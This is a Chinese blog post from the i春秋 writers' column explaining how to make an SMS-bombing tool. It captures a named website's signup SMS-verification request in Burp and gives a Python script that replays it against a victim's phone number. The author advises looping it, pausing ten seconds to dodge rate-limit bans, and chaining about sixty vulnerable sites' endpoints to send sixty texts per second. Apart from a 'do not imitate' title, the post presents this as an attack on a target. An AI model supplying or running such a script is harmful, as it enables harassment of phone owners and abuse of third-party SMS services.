小小的测试,请勿模仿

本文作者:i春秋作家——Hacker1ee

大家好,我是1ee(因为在作家群,就不加Hacker这个前缀了,怕被大佬打。。)

刚加入i春秋作家组希望大家多多关照,也欢迎大家找我交流

今天我来讲讲我最近找到的一个小思路,利用python进行短信轰炸

首先

这是一个网站,他的业务存在短信发送

1.png

这个时候,我们打开神器burp或者其他抓包工具(最好用burp,因为repeater模块可以满足我们的需要)

这时候我给我的火狐挂上代理,然后burp开启拦截

2.png

抓到了一个包,发送到repeater

3.png

进入repeater分析数据包

4.png


{"mobile":"13xxxxxx","type":"signup"}

这个是发送的数据,go走起

看返回的包可以看到是成功的

5.png

然后开始写我们的python进行循环发包对目标进行轰炸

6.png

import requests
import json
headers = {'User-Agent'  : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.demlution.com/'}
#data =
#print data
r = requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"手机号码","type":"signup"}),headers=headers)
 
 
print(r.text)

先进行测试,测试完成后可以for循环加强脚本的威力,经过我的研究发现当一个号码多次提交后会被ban,如我一次性发了10个包后(也就是发了十条短信)之后的这个号码就不会再发了,即使返回的包状态是成功,但是短信是发不到的,其实我们可以停顿十秒再发下一个,这样就不会被ban,这也是测试知道的

好了,今天我就说道这吧,可能大家会说就一个号码我直接加入黑名单就ok了,的确,但是我们可以挖掘这类型的网站,然后一个一个接口发送一次,60个接口,一秒钟就60条短信,威力还是可以的,附上成功的图片

7.png8.png9.jpg


专栏:i春秋学院::i春秋学院